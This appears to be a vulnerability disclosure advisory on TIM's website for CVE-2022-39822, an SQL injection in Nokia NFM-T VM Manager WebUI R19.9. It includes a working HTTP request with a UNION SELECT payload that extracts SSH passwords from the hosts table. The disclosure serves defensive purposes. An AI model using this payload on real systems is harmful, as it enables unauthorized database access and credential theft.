La Sostenibilità per TIM

Il Report 2024 accoglie i principi della Corporate Sustainability Reporting Directive (CSRD) ed è incluso nella Relazione Finanziaria e di Sostenibilità. Approfondisci

Ultimi Comunicati Stampa

Redazione ufficio stampa

Leggi gli ultimi comunicati stampa e naviga nell'archivio dell'Ufficio Stampa del Gruppo TIM. Leggi i comunicati

CVE-2022-39822

CVE-2022-39822 – NOKIA NFM-T VM Manager WebUI

Vulnerability Description: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') – CWE-89

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39822

CVSv3: 8.8

Severity: High

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

The Web Application is affected by SQL Injection vulnerability. Through the injection of arbitrary SQL statements, a potential attacker can modify query syntax and perform unauthorized (and unexpected) operations against the remote database.

 

Step-by-step instructions and PoC

A remote user, authenticated to the web application may manipulate the request parameters to exploit error output from the database to manipulate its data. It manipulates the database into generating an error that informs the actor of the database’s structure and afterwards extracts the data contents in the database statement. Please see the examples below for step-by-step instructions to reproduce the vulnerability.

Affected Endpoints

 

·       URL: https://<host>/cgi-bin/R19.9/easy1350.pl?action=edit_master&session=[REDACTED]&id=1host=1

·       HTTP Parameter: id, host

 

Below are the evidences with the vulnerability details and the payloads used.

 

GET /cgi-bin/R19.9/easy1350.pl?action=edit_master&session=KALEVO19&id=1'+union+SELECT+group_concat(ssh_password,'~~')+FROM+hosts+--&host=1 HTTP/1.1

Host: <host>

Cookie: XSRF=[REDACTED]

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Authorization: Basic [REDACTED]

Connection: close

 

This first step consists of changing the value parameter to obtain a SQL error:

Then the attacker can manipulate the parameter passed to the function, to discover the names of users, data from other tables, or to eventually guess the database hostname. More in detail, it was possible to extract the ssh password of the root user.

 

Security Impact

 

Malicious users can access data processed by the database, and potentially conduct further attacks against the database, other portal’s users and the server machine itself.